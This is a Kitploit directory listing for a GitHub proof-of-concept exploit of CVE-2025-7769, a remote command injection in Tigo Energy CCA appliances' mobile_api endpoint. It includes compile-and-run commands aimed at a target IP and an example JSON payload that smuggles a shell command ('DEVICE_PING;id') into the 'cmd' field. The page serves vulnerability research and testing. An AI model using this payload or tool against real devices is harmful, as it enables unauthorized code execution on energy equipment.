Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-7769 — PoC to inject a command via the DEVICE_PING endpoint | Kitploit
Tools/GitHubGitHub/bytereaper77/cve-2025-7769
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingArchived
GitHubbytereaper77/cve-2025-7769

CVE-2025-7769

PoC to inject a command via the DEVICE_PING endpoint

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-7769 – Remote Command Injection in mobile_api

Description :

This repository contains a Proof‑of‑Concept (PoC) exploit for CVE‑2025‑7769, a critical remote Command Injection vulnerability found in Tigo Energy CCA appliances exposing the /cgi-bin/mobile_api endpoint.

The vulnerability is triggered by injecting OS commands via the cmd JSON key, where unfiltered input is concatenated directly into a system call, allowing full remote code execution (RCE) on the device.

References :

  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-7769

Usage :

root@kitploit:~
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.

Use -u http://target.com if you want to pass a full base URL instead of IP/port.

Example Payload :

{
  "cmd": "DEVICE_PING;id",
  "dev": 2,
  "ver": 1
}

License :

Download Tool

MIT License